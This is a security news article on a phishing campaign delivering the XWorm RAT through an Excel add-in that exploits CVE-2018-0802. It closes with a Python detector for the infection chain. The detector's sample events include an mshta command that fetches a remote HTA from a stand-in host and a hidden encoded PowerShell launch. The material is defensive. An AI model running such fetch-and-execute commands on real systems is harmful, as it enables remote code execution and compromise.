In a recent cybersecurity alert, experts have identified a phishing campaign that deploys an updated version of the XWorm Remote Access Trojan (RAT). This malware grants cybercriminals comprehensive control over infected Microsoft Windows systems, posing significant risks to users.
Background on XWorm RAT
First tracked in 2022, XWorm remains a prevalent threat within the digital security landscape. It is commonly circulated via Telegram-based marketplaces, making it easily accessible to a wide range of threat actors. Its persistent use underscores the need for continuous vigilance against such cyber threats.
The latest campaign employs a variety of business-themed emails, such as payment verifications and shipment confirmations, to lure recipients into opening a malicious Excel add-in file (.XLAM). Opening the file starts a chain that moves quickly from the document itself to a payload delivered directly into the system's memory, with little written to disk along the way.
Technical Breakdown of the Attack
The campaign was uncovered by Fortinet researchers, who detailed how the malicious Excel file exploits the CVE-2018-0802 vulnerability. This flaw in Microsoft’s Equation Editor allows remote code execution, providing a pathway for attackers to inject harmful code into a system.
Once triggered, the exploit downloads an HTA file from a specified URL and executes it using ShellExecuteExW. Handing off to an HTA file keeps the activity inconspicuous: it runs under a legitimate Windows component (mshta.exe), so it blends in with ordinary system processes while the next stage is prepared.
Payload Execution and Defense
Subsequently, the obfuscated HTA file, executed under mshta.exe, deploys a Base64-encoded PowerShell payload. This payload retrieves a hidden .NET module from an image file hosted online. The module, cleverly disguised with the assembly name Microsoft.Win32.TaskScheduler, operates in memory, making detection more challenging.
The final step involves the .NET loader decrypting and executing the XWorm payload by using process hollowing to inject it into Msbuild.exe. The RAT then communicates with a command-and-control server using encrypted traffic. To counter this, cybersecurity professionals advise patching the Equation Editor vulnerability, restricting .XLAM and HTA execution paths, and implementing strict controls on mshta.exe, PowerShell, and Msbuild.exe activities.
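The chain described above has three process hand-offs that a defender can look for in endpoint telemetry: Equation Editor spawning a child, mshta.exe launching PowerShell with an encoded command, and MSBuild.exe starting under a scripting host rather than a build tool. The following is an added example, not code from Fortinet's report; it runs that detection logic over constructed Sysmon-style process-creation events and assumes the Equation Editor executable is named EQNEDT32.EXE and that events carry pid, ppid, image and command-line fields.

```python
import base64
import re

# Constructed Sysmon-style process-creation events (not real telemetry). The
# encoded PowerShell argument is a harmless placeholder built the way
# -EncodedCommand expects it: Base64 over UTF-16LE text.
ENC = base64.b64encode("Write-Output 'stage2 placeholder'".encode("utf-16-le")).decode()
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k DcomLaunch"},
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "cmd": "EXCEL.EXE invoice.xlam"},
    # Equation Editor is an out-of-process COM server, so its parent is svchost, not Excel.
    {"pid": 101, "ppid": 1, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "cmd": "EQNEDT32.EXE -Embedding"},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\mshta.exe", "cmd": "mshta.exe http://example.invalid/stage.hta"},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe -w hidden -enc " + ENC},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "cmd": "MSBuild.exe"},
    # Benign build from Visual Studio: same MSBuild image, but an expected parent.
    {"pid": 200, "ppid": 1, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe", "cmd": "devenv.exe"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "cmd": "MSBuild.exe app.csproj"},
]
SCRIPT_HOST_PARENTS = {"eqnedt32.exe", "mshta.exe", "powershell.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def lineage(by_pid, pid):
    """Process names from the root ancestor down to pid, for analyst context."""
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))

def detect(events):
    """Flag the three hand-offs of the chain; returns (pid, rule, detail) tuples."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, parent = basename(e["image"]), by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if pname == "eqnedt32.exe":  # Equation Editor has no business spawning children
            findings.append((e["pid"], "eqnedt32-spawned-process", name))
        if name == "powershell.exe" and pname == "mshta.exe":
            findings.append((e["pid"], "mshta-launched-powershell", decode_encoded_command(e["cmd"]) or "<no encoded command>"))
        if name == "msbuild.exe" and pname in SCRIPT_HOST_PARENTS:
            findings.append((e["pid"], "msbuild-unusual-parent", " > ".join(lineage(by_pid, e["pid"]))))
    return findings
```

The benign Visual Studio build is left unflagged, which is the point of keying the MSBuild rule on the parent rather than on the image name alone.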
As cyber threats evolve, staying informed and implementing robust security measures are crucial. Follow us for more updates on emerging cyber threats and defenses.
